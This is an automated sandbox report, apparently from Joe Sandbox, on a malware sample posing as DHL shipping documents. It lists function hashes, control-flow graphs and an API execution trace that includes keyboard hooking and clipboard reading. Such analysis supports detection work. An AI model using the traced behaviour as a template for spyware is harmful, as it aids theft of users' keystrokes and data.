                                                • Instruction Fuzzy Hash: 46F0F832A04A2C8FEF64DB58DC81BD9B3B1FB95310F0041E6C55EA3241CA30AE85CF81
                                                Function 00007FFAACCF1470 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8a450c990ff722a1f64be4ef7e877e487d8dc79c510512b13a24c7053d65d07
                                                • Instruction ID: 2b807debb4d84a6e0964edcd8095af24e9c42603a68a5c81e640f59887a09783
                                                • Opcode Fuzzy Hash: f8a450c990ff722a1f64be4ef7e877e487d8dc79c510512b13a24c7053d65d07
                                                • Instruction Fuzzy Hash: C8E0C230B09C0E4F9A94F71DA84466572D6EFD932034842B7E40DC3259CD14CC8183C0
                                                Function 00007FFAACCD9D85 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b5efc714a66c2f8b0ccddd8ea20b54b97ca5e2c9e7c9c0434a5d0a1481c9c78
                                                • Instruction ID: d6cebfec859acc11074d20dbb77753f8ecadd72e0d5e440890599d8fd50c0336
                                                • Opcode Fuzzy Hash: 8b5efc714a66c2f8b0ccddd8ea20b54b97ca5e2c9e7c9c0434a5d0a1481c9c78
                                                • Instruction Fuzzy Hash: 0BE0DF6181968C8BD7226B304815194BB70AF4A200B8541D3D05CC6093ED2D951D8392
                                                Function 00007FFAACCD083D Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95665ef601232f31361ea332cc330b60a17e4a3e551bfceaffe93f6263da1977
                                                • Instruction ID: b237531d8cdc8a1297a59aad33b9c7e7e7527fbbc66964ec909ea20bda704d98
                                                • Opcode Fuzzy Hash: 95665ef601232f31361ea332cc330b60a17e4a3e551bfceaffe93f6263da1977
                                                • Instruction Fuzzy Hash: A9D05E4150F2D5A6E753232E5C556F97F40EF93121B8883FBE04C8A0839C0E46AF83D2
                                                Function 00007FFAACCDB290 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa7fb5965b32db5d9d9ba6078ce63bdf824ae8095ee98eb77a20ae6919fea759
                                                • Instruction ID: 8f5f58d2b49bf05ad80383110ede53f42ce59fe176e15b8f879f0e7028797916
                                                • Opcode Fuzzy Hash: fa7fb5965b32db5d9d9ba6078ce63bdf824ae8095ee98eb77a20ae6919fea759
                                                • Instruction Fuzzy Hash: 76D05E42B25E0947F649AB3E0C5E23433C2EB98151F99C1729409C2295ED68989B4A85
                                                Function 00007FFAACCE4A80 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7cb091ce5d6740dfc8ec2055ff1ce041db4e9d7316656098ade4780755342278
                                                • Instruction ID: d05ff9e4fca83be6fc49688493d4563c55b1db183cf5902872187d1d106c0707
                                                • Opcode Fuzzy Hash: 7cb091ce5d6740dfc8ec2055ff1ce041db4e9d7316656098ade4780755342278
                                                • Instruction Fuzzy Hash: E4D01D20928E294FE6B4FB7450457A5A1E0FF19310F404965D02EC358DDF68E98943C1
                                                Function 00007FFAACCD3238 Relevance: .0, Instructions: 1COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9dfd6038dbf7ff194d4d17c8f16f7b6664d95c2672182b08ccb5ca7cac75a4d5
                                                • Instruction ID: 13535b9a41add44d0cf5cbe94dd577bd6d235784c95b89f4ecacb7f10aae8755
                                                • Opcode Fuzzy Hash: 9dfd6038dbf7ff194d4d17c8f16f7b6664d95c2672182b08ccb5ca7cac75a4d5
                                                • Instruction Fuzzy Hash:

                                                Non-executed Functions

                                                Function 00007FFAACCD31F0 Relevance: 5.3, Strings: 3, Instructions: 1534COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: V_H$Xk!$Xk!
                                                • API String ID: 0-1325944758
                                                • Opcode ID: 0a12ba1744bb1d92eba1e3d75d9d13845e78a8bf5cf33023ef96db5e66389e8b
                                                • Instruction ID: e25d15d99dd803840fb2177bd45f8724d4575e909df8c122a4d52b923b58643d
                                                • Opcode Fuzzy Hash: 0a12ba1744bb1d92eba1e3d75d9d13845e78a8bf5cf33023ef96db5e66389e8b
                                                • Instruction Fuzzy Hash: 35A20371A1DB4A8FFB98DF2C8495A7477D1EF56708B1481B9D04EC72A2DE24EC4A87C0
                                                Function 00007FFAACDE10F0 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453977478.00007FFAACDE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacde0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 99e89291c05f20adce5b15fa3630a1b327bc59d416222f01789c539d33b33037
                                                • Instruction ID: ccf77d9855c1e16f5694b7f99f3608965d79e3c93d6240c8a43de953d1f67dac
                                                • Opcode Fuzzy Hash: 99e89291c05f20adce5b15fa3630a1b327bc59d416222f01789c539d33b33037
                                                • Instruction Fuzzy Hash: 1C119AA6A0E7C28FF366972848162657FA1AF57210F0946FFC1D88B1A3E608584D8392

                                                Execution Graph

                                                Execution Coverage:12.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:177
                                                Total number of Limit Nodes:20
                                                execution_graph 40537 6d5a010 40538 6d5a011 GetCurrentProcess 40537->40538 40540 6d5a0a1 40538->40540 40541 6d5a0a8 GetCurrentThread 40538->40541 40540->40541 40542 6d5a0e5 GetCurrentProcess 40541->40542 40543 6d5a0de 40541->40543 40544 6d5a11b 40542->40544 40543->40542 40545 6d5a143 GetCurrentThreadId 40544->40545 40546 6d5a174 40545->40546 40740 6d5bca0 40741 6d5bcab 40740->40741 40742 6d5bcbb 40741->40742 40744 6d5b710 40741->40744 40745 6d5bcf0 OleInitialize 40744->40745 40746 6d5bd54 40745->40746 40746->40742 40549 15e0848 40551 15e0849 40549->40551 40550 15e091b 40551->40550 40553 15e1330 40551->40553 40555 15e1334 40553->40555 40554 15e1438 40554->40551 40555->40554 40561 6d53460 40555->40561 40567 6d5345b 40555->40567 40573 15e7c88 40555->40573 40577 15e7e68 40555->40577 40587 15e7d50 40555->40587 40562 6d53472 40561->40562 40565 6d53523 40562->40565 40591 6d51294 40562->40591 40564 6d534e9 40596 6d512b4 40564->40596 40565->40555 40568 6d53460 40567->40568 40569 6d51294 4 API calls 40568->40569 40571 6d53523 40568->40571 40570 6d534e9 40569->40570 40572 6d512b4 KiUserCallbackDispatcher 40570->40572 40571->40555 40572->40571 40574 15e7d44 40573->40574 40575 15e7ee7 40574->40575 40660 15ef4f0 40574->40660 40575->40555 40578 15e7e72 40577->40578 40580 15e7eb4 40578->40580 40669 6d6f9c0 40578->40669 40674 6d6f9bb 40578->40674 40579 15e7ee7 40579->40555 40580->40579 40586 15ef4f0 GlobalMemoryStatusEx 40580->40586 40581 15e7e85 40584 15eeac8 GlobalMemoryStatusEx 40581->40584 40679 15eeac3 40581->40679 40584->40580 40586->40579 40589 15e7d51 40587->40589 40588 15e7ee7 40588->40555 40589->40588 40590 15ef4f0 GlobalMemoryStatusEx 40589->40590 40590->40588 40592 6d5129f 40591->40592 40600 6d54a18 40592->40600 40608 6d54a28 40592->40608 40593 6d53ad2 40593->40564 40597 6d512bf 40596->40597 40599 6d5b413 40597->40599 40656 6d59e64 40597->40656 40599->40565 40601 6d54a28 40600->40601 40616 6d54f90 40601->40616 40602 6d54ad6 40603 6d539bc GetModuleHandleW 40602->40603 40605 6d54b02 40602->40605 40604 6d54b46 40603->40604 40607 6d564a2 CreateWindowExW 40604->40607 40607->40605 40609 6d54a53 40608->40609 40615 6d54f90 3 API calls 40609->40615 40610 6d54ad6 40611 6d539bc GetModuleHandleW 40610->40611 40613 6d54b02 40610->40613 40612 6d54b46 40611->40612 40651 6d564a2 40612->40651 40615->40610 40617 6d54fcd 40616->40617 40618 6d5504e 40617->40618 40621 6d55110 40617->40621 40634 6d5510a 40617->40634 40622 6d55125 40621->40622 40624 6d55149 40622->40624 40647 6d539bc 40622->40647 40625 6d539bc GetModuleHandleW 40624->40625 40628 6d55314 40624->40628 40627 6d5529a 40625->40627 40626 6d5536f 40626->40618 40627->40626 40627->40628 40631 6d539bc GetModuleHandleW 40627->40631 40628->40618 40628->40626 40629 6d55498 GetModuleHandleW 40628->40629 40630 6d554c5 40629->40630 40630->40618 40632 6d552e8 40631->40632 40632->40628 40633 6d539bc GetModuleHandleW 40632->40633 40633->40628 40635 6d55110 40634->40635 40636 6d539bc GetModuleHandleW 40635->40636 40637 6d55149 40635->40637 40636->40637 40638 6d539bc GetModuleHandleW 40637->40638 40646 6d55314 40637->40646 40640 6d5529a 40638->40640 40639 6d5536f 40639->40618 40640->40639 40643 6d539bc GetModuleHandleW 40640->40643 40640->40646 40641 6d55498 GetModuleHandleW 40642 6d554c5 40641->40642 40642->40618 40644 6d552e8 40643->40644 40645 6d539bc GetModuleHandleW 40644->40645 40644->40646 40645->40646 40646->40618 40646->40639 40646->40641 40648 6d55450 GetModuleHandleW 40647->40648 40650 6d554c5 40648->40650 40650->40624 40653 6d564a8 40651->40653 40652 6d564b1 40652->40613 40653->40652 40654 6d565bb CreateWindowExW 40653->40654 40655 6d5661c 40654->40655 40657 6d5b428 KiUserCallbackDispatcher 40656->40657 40659 6d5b496 40657->40659 40659->40597 40661 15ef532 40660->40661 40662 15ef567 40661->40662 40664 15eeac8 40661->40664 40665 15eeae2 40664->40665 40666 15eed29 40665->40666 40667 6d6fc07 GlobalMemoryStatusEx 40665->40667 40668 6d6fe64 GlobalMemoryStatusEx 40665->40668 40666->40661 40667->40665 40668->40665 40671 6d6f9c5 40669->40671 40670 6d6fbea 40670->40581 40671->40670 40672 6d6fc07 GlobalMemoryStatusEx 40671->40672 40673 6d6fe64 GlobalMemoryStatusEx 40671->40673 40672->40671 40673->40671 40676 6d6f9c0 40674->40676 40675 6d6fbea 40675->40581 40676->40675 40677 6d6fc07 GlobalMemoryStatusEx 40676->40677 40678 6d6fe64 GlobalMemoryStatusEx 40676->40678 40677->40676 40678->40676 40681 15eeae2 40679->40681 40680 15eed29 40680->40580 40681->40680 40682 6d6fc07 GlobalMemoryStatusEx 40681->40682 40683 6d6fe64 GlobalMemoryStatusEx 40681->40683 40682->40681 40683->40681 40684 2fb2ca0 40686 2fb2ca9 40684->40686 40685 2fb2ce7 40686->40685 40687 15eeac8 GlobalMemoryStatusEx 40686->40687 40688 15eeac3 GlobalMemoryStatusEx 40686->40688 40687->40686 40688->40686 40547 6d5a258 DuplicateHandle 40548 6d5a2ee 40547->40548 40689 159d044 40690 159d05c 40689->40690 40692 159d0b6 40690->40692 40696 6d566b0 40690->40696 40700 6d547ac 40690->40700 40708 6d566a2 40690->40708 40712 6d5ae33 40690->40712 40697 6d566d6 40696->40697 40698 6d547ac CallWindowProcW 40697->40698 40699 6d566f7 40698->40699 40699->40692 40701 6d547b7 40700->40701 40702 6d5aec1 40701->40702 40704 6d5aeb1 40701->40704 40729 6d59e0c 40702->40729 40721 6d5afd8 40704->40721 40725 6d5afe8 40704->40725 40705 6d5aebf 40705->40705 40709 6d566b0 40708->40709 40710 6d547ac CallWindowProcW 40709->40710 40711 6d566f7 40710->40711 40711->40692 40713 6d5ae3a 40712->40713 40715 6d5ae4a 40712->40715 40713->40692 40714 6d5aec1 40716 6d59e0c CallWindowProcW 40714->40716 40715->40714 40717 6d5aeb1 40715->40717 40718 6d5aebf 40716->40718 40719 6d5afd8 CallWindowProcW 40717->40719 40720 6d5afe8 CallWindowProcW 40717->40720 40718->40718 40719->40718 40720->40718 40723 6d5afe6 40721->40723 40722 6d59e0c CallWindowProcW 40722->40723 40723->40722 40724 6d5b0ce 40723->40724 40724->40705 40726 6d5aff6 40725->40726 40727 6d59e0c CallWindowProcW 40726->40727 40728 6d5b0ce 40726->40728 40727->40726 40728->40705 40730 6d59e17 40729->40730 40731 6d5b182 CallWindowProcW 40730->40731 40732 6d5b131 40730->40732 40731->40732 40732->40705 40733 6d5d988 40734 6d5d9cc SetWindowsHookExA 40733->40734 40736 6d5da12 40734->40736 40737 6d5be38 40738 6d5be92 OleGetClipboard 40737->40738 40739 6d5bed2 40738->40739

                                                Executed Functions

                                                Function 06D630B8 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 127 6d630b8-6d630d9 128 6d630db-6d630de 127->128 129 6d63104-6d63107 128->129 130 6d630e0-6d630ff 128->130 131 6d6310d-6d6312c 129->131 132 6d638a8-6d638aa 129->132 130->129 140 6d63145-6d6314f 131->140 141 6d6312e-6d63131 131->141 133 6d638b1-6d638b4 132->133 134 6d638ac 132->134 133->128 137 6d638ba-6d638c3 133->137 134->133 145 6d63155-6d63164 140->145 141->140 142 6d63133-6d63143 141->142 142->145 253 6d63166 call 6d638d0 145->253 254 6d63166 call 6d638d8 145->254 146 6d6316b-6d63170 147 6d63172-6d63178 146->147 148 6d6317d-6d6345a 146->148 147->137 169 6d63460-6d6350f 148->169 170 6d6389a-6d638a7 148->170 179 6d63511-6d63536 169->179 180 6d63538 169->180 182 6d63541-6d63554 179->182 180->182 184 6d63881-6d6388d 182->184 185 6d6355a-6d6357c 182->185 184->169 186 6d63893 184->186 185->184 188 6d63582-6d6358c 185->188 186->170 188->184 189 6d63592-6d6359d 188->189 189->184 190 6d635a3-6d63679 189->190 202 6d63687-6d636b7 190->202 203 6d6367b-6d6367d 190->203 207 6d636c5-6d636d1 202->207 208 6d636b9-6d636bb 202->208 203->202 209 6d636d3-6d636d7 207->209 210 6d63731-6d63735 207->210 208->207 209->210 213 6d636d9-6d63703 209->213 211 6d63872-6d6387b 210->211 212 6d6373b-6d63777 210->212 211->184 211->190 224 6d63785-6d63793 212->224 225 6d63779-6d6377b 212->225 220 6d63705-6d63707 213->220 221 6d63711-6d6372e 213->221 220->221 221->210 227 6d63795-6d637a0 224->227 228 6d637aa-6d637b5 224->228 225->224 227->228 231 6d637a2 227->231 232 6d637b7-6d637bd 228->232 233 6d637cd-6d637de 228->233 231->228 234 6d637c1-6d637c3 232->234 235 6d637bf 232->235 237 6d637f6-6d63802 233->237 238 6d637e0-6d637e6 233->238 234->233 235->233 242 6d63804-6d6380a 237->242 243 6d6381a-6d6386b 237->243 239 6d637ea-6d637ec 238->239 240 6d637e8 238->240 239->237 240->237 244 6d6380e-6d63810 242->244 245 6d6380c 242->245 243->211 244->243 245->243 253->146 254->146
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q$$q$$q$$q$$q
                                                • API String ID: 0-2069967915
                                                • Opcode ID: 40b09799c8202f6a8d8b0a08615e7e29058d2db8e04ee899552d2e106e99d31f
                                                • Instruction ID: 25890dc66653f9462e0ca7c8dc6707fc84d4a72461f4e5e01978015a83312836
                                                • Opcode Fuzzy Hash: 40b09799c8202f6a8d8b0a08615e7e29058d2db8e04ee899552d2e106e99d31f
                                                • Instruction Fuzzy Hash: 49322E31E10719CBCB14DF69D85469DF7B2FFC9300F2196A9E409AB264EB30A985CB90
                                                Function 06D67DE0 Relevance: 3.0, Strings: 2, Instructions: 478COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1121 6d67de0-6d67dfe 1122 6d67e00-6d67e03 1121->1122 1123 6d67e24-6d67e27 1122->1123 1124 6d67e05-6d67e1f 1122->1124 1125 6d67e4a-6d67e4d 1123->1125 1126 6d67e29-6d67e45 1123->1126 1124->1123 1128 6d67e64-6d67e67 1125->1128 1129 6d67e4f-6d67e5d 1125->1129 1126->1125 1130 6d67e74-6d67e76 1128->1130 1131 6d67e69-6d67e73 1128->1131 1137 6d67e86-6d67e9c 1129->1137 1138 6d67e5f 1129->1138 1134 6d67e7d-6d67e80 1130->1134 1135 6d67e78 1130->1135 1134->1122 1134->1137 1135->1134 1141 6d680b7-6d680c1 1137->1141 1142 6d67ea2-6d67eab 1137->1142 1138->1128 1143 6d680c2-6d680f7 1142->1143 1144 6d67eb1-6d67ece 1142->1144 1147 6d680f9-6d680fc 1143->1147 1151 6d680a4-6d680b1 1144->1151 1152 6d67ed4-6d67efc 1144->1152 1149 6d68102-6d6810e 1147->1149 1150 6d681a9-6d681ac 1147->1150 1157 6d68119-6d6811b 1149->1157 1153 6d681ae-6d681ca 1150->1153 1154 6d681cf-6d681d2 1150->1154 1151->1141 1151->1142 1152->1151 1177 6d67f02-6d67f0b 1152->1177 1153->1154 1155 6d68407-6d68409 1154->1155 1156 6d681d8-6d681e7 1154->1156 1159 6d68410-6d68413 1155->1159 1160 6d6840b 1155->1160 1172 6d68206-6d6824a 1156->1172 1173 6d681e9-6d68204 1156->1173 1162 6d68133-6d68137 1157->1162 1163 6d6811d-6d68123 1157->1163 1159->1147 1167 6d68419-6d68422 1159->1167 1160->1159 1164 6d68145 1162->1164 1165 6d68139-6d68143 1162->1165 1168 6d68127-6d68129 1163->1168 1169 6d68125 1163->1169 1170 6d6814a-6d6814c 1164->1170 1165->1170 1168->1162 1169->1162 1175 6d68163-6d6819c 1170->1175 1176 6d6814e-6d68151 1170->1176 1181 6d68250-6d68261 1172->1181 1182 6d683db-6d683f1 1172->1182 1173->1172 1175->1156 1201 6d6819e-6d681a8 1175->1201 1176->1167 1177->1143 1179 6d67f11-6d67f2d 1177->1179 1189 6d68092-6d6809e 1179->1189 1190 6d67f33-6d67f5d 1179->1190 1191 6d683c6-6d683d5 1181->1191 1192 6d68267-6d68284 1181->1192 1182->1155 1189->1151 1189->1177 1204 6d67f63-6d67f8b 1190->1204 1205 6d68088-6d6808d 1190->1205 1191->1181 1191->1182 1192->1191 1203 6d6828a-6d68380 call 6d66600 1192->1203 1254 6d68382-6d6838c 1203->1254 1255 6d6838e 1203->1255 1204->1205 1211 6d67f91-6d67fbf 1204->1211 1205->1189 1211->1205 1217 6d67fc5-6d67fce 1211->1217 1217->1205 1218 6d67fd4-6d68006 1217->1218 1226 6d68011-6d6802d 1218->1226 1227 6d68008-6d6800c 1218->1227 1226->1189 1229 6d6802f-6d68086 call 6d66600 1226->1229 1227->1205 1228 6d6800e 1227->1228 1228->1226 1229->1189 1256 6d68393-6d68395 1254->1256 1255->1256 1256->1191 1257 6d68397-6d6839c 1256->1257 1258 6d6839e-6d683a8 1257->1258 1259 6d683aa 1257->1259 1260 6d683af-6d683b1 1258->1260 1259->1260 1260->1191 1261 6d683b3-6d683bf 1260->1261 1261->1191
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q
                                                • API String ID: 0-3126353813
                                                • Opcode ID: 473ad67c7ae8dffdad95656fcaafdd3d40ec1b1b632ef5b4a25676bf198dc9a2
                                                • Instruction ID: 566ec683f137a9daaddce9392a28b07406f53d1104a0dbe65487145c00ab31af
                                                • Opcode Fuzzy Hash: 473ad67c7ae8dffdad95656fcaafdd3d40ec1b1b632ef5b4a25676bf198dc9a2
                                                • Instruction Fuzzy Hash: 06029F30B002059FDB64DB6AD894BAEB7E2FF84310F148569E415DB395DB35EC82CBA0
                                                Function 06D65600 Relevance: 1.9, Strings: 1, Instructions: 602COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2085 6d65600-6d6561d 2086 6d6561f-6d65622 2085->2086 2087 6d65624-6d6562a 2086->2087 2088 6d65635-6d65638 2086->2088 2089 6d65630 2087->2089 2090 6d65728-6d6572e 2087->2090 2091 6d65655-6d65658 2088->2091 2092 6d6563a-6d65650 2088->2092 2089->2088 2094 6d65734-6d6573c 2090->2094 2095 6d657cc-6d657fb 2090->2095 2091->2087 2093 6d6565a-6d6565d 2091->2093 2092->2091 2097 6d65671-6d65674 2093->2097 2098 6d6565f-6d6566c 2093->2098 2094->2095 2099 6d65742-6d6574f 2094->2099 2109 6d65805-6d65808 2095->2109 2101 6d65676-6d6567c 2097->2101 2102 6d65683-6d65686 2097->2102 2098->2097 2099->2095 2100 6d65751-6d65755 2099->2100 2105 6d6575a-6d6575d 2100->2105 2106 6d6567e 2101->2106 2107 6d65688-6d65692 2101->2107 2102->2107 2108 6d656a0-6d656a3 2102->2108 2112 6d65773-6d65776 2105->2112 2113 6d6575f-6d6576e 2105->2113 2106->2102 2116 6d65699-6d6569b 2107->2116 2110 6d656a5-6d656ab 2108->2110 2111 6d656b2-6d656b5 2108->2111 2117 6d65812-6d65815 2109->2117 2118 6d6580a-6d65811 2109->2118 2119 6d656ad 2110->2119 2120 6d6570a-6d6570d 2110->2120 2121 6d656b7-6d656c0 2111->2121 2122 6d656c1-6d656c4 2111->2122 2114 6d6577d-6d65780 2112->2114 2115 6d65778-6d6577a 2112->2115 2113->2112 2123 6d65782-6d65797 2114->2123 2124 6d6579c-6d6579f 2114->2124 2115->2114 2116->2108 2125 6d65826-6d65829 2117->2125 2126 6d65817-6d65821 2117->2126 2119->2111 2127 6d65712-6d65715 2120->2127 2128 6d656c6-6d656c7 2122->2128 2129 6d656cc-6d656cf 2122->2129 2123->2124 2133 6d657a1-6d657a5 2124->2133 2134 6d657ac-6d657ae 2124->2134 2135 6d6584b-6d6584e 2125->2135 2136 6d6582b-6d6582f 2125->2136 2126->2125 2131 6d65717-6d6571e 2127->2131 2132 6d65723-6d65726 2127->2132 2128->2129 2137 6d656d1-6d656d4 2129->2137 2138 6d656d9-6d656dc 2129->2138 2131->2132 2132->2090 2132->2105 2141 6d657a7 2133->2141 2142 6d657be-6d657cb 2133->2142 2145 6d657b5-6d657b8 2134->2145 2146 6d657b0 2134->2146 2147 6d65870-6d65873 2135->2147 2148 6d65850-6d65854 2135->2148 2143 6d65835-6d6583d 2136->2143 2144 6d658f2-6d6592c 2136->2144 2137->2138 2138->2101 2149 6d656de-6d656e1 2138->2149 2141->2134 2143->2144 2150 6d65843-6d65846 2143->2150 2162 6d6592e-6d65931 2144->2162 2145->2086 2145->2142 2146->2145 2154 6d65875-6d65879 2147->2154 2155 6d6588d-6d65890 2147->2155 2148->2144 2151 6d6585a-6d65862 2148->2151 2152 6d65705-6d65708 2149->2152 2153 6d656e3-6d65700 2149->2153 2150->2135 2151->2144 2160 6d65868-6d6586b 2151->2160 2152->2120 2152->2127 2153->2152 2154->2144 2156 6d6587b-6d65883 2154->2156 2158 6d65892-6d65899 2155->2158 2159 6d658a0-6d658a3 2155->2159 2156->2144 2161 6d65885-6d65888 2156->2161 2163 6d658ea-6d658f1 2158->2163 2164 6d6589b 2158->2164 2165 6d658a5-6d658a9 2159->2165 2166 6d658bd-6d658c0 2159->2166 2160->2147 2161->2155 2168 6d65933-6d6593a 2162->2168 2169 6d6593f-6d65942 2162->2169 2164->2159 2165->2144 2170 6d658ab-6d658b3 2165->2170 2171 6d658c2-6d658d3 2166->2171 2172 6d658d8-6d658da 2166->2172 2168->2169 2174 6d65944-6d6594b 2169->2174 2175 6d65950-6d65953 2169->2175 2170->2144 2176 6d658b5-6d658b8 2170->2176 2171->2172 2177 6d658e1-6d658e4 2172->2177 2178 6d658dc 2172->2178 2174->2175 2179 6d65955-6d65968 2175->2179 2180 6d6596b-6d6596e 2175->2180 2176->2166 2177->2109 2177->2163 2178->2177 2182 6d65970-6d65981 2180->2182 2183 6d65988-6d6598b 2180->2183 2182->2168 2190 6d65983 2182->2190 2184 6d65c74-6d65c77 2183->2184 2185 6d65991-6d65b25 2183->2185 2187 6d65c91-6d65c94 2184->2187 2188 6d65c79-6d65c8a 2184->2188 2234 6d65c5e-6d65c71 2185->2234 2235 6d65b2b-6d65b32 2185->2235 2192 6d65c96-6d65ca7 2187->2192 2193 6d65cb2-6d65cb5 2187->2193 2188->2192 2196 6d65c8c 2188->2196 2190->2183 2192->2168 2200 6d65cad 2192->2200 2193->2185 2195 6d65cbb-6d65cbe 2193->2195 2195->2185 2199 6d65cc4-6d65cc7 2195->2199 2196->2187 2201 6d65ce5-6d65ce8 2199->2201 2202 6d65cc9-6d65cda 2199->2202 2200->2193 2203 6d65cf2-6d65cf5 2201->2203 2204 6d65cea-6d65cef 2201->2204 2202->2168 2212 6d65ce0 2202->2212 2206 6d65cf7-6d65d08 2203->2206 2207 6d65d13-6d65d15 2203->2207 2204->2203 2206->2179 2215 6d65d0e 2206->2215 2209 6d65d17 2207->2209 2210 6d65d1c-6d65d1f 2207->2210 2209->2210 2210->2162 2214 6d65d25-6d65d2e 2210->2214 2212->2201 2215->2207 2236 6d65be6-6d65bed 2235->2236 2237 6d65b38-6d65b5b 2235->2237 2236->2234 2238 6d65bef-6d65c22 2236->2238 2246 6d65b63-6d65b6b 2237->2246 2250 6d65c27-6d65c54 2238->2250 2251 6d65c24 2238->2251 2248 6d65b70-6d65bb1 2246->2248 2249 6d65b6d 2246->2249 2259 6d65bb3-6d65bc4 2248->2259 2260 6d65bc9-6d65bda 2248->2260 2249->2248 2250->2214 2251->2250 2259->2214 2260->2214
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $
                                                • API String ID: 0-3993045852
                                                • Opcode ID: 16fa0ad06376a851b91982820b1f10a10a13fac18aa394fe956a3c91c759c7ae
                                                • Instruction ID: 8650bd945ed4dc66a90e7dc04df77a162c691c0e2aa44bda0ecbf375a576cd03
                                                • Opcode Fuzzy Hash: 16fa0ad06376a851b91982820b1f10a10a13fac18aa394fe956a3c91c759c7ae
                                                • Instruction Fuzzy Hash: 9E22B175F002158FDF64DBA9E4807AEBBB2FF85320F248469E446AB354DA35DC81CB90
                                                Function 06D55110 Relevance: 1.8, APIs: 1, Instructions: 324COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
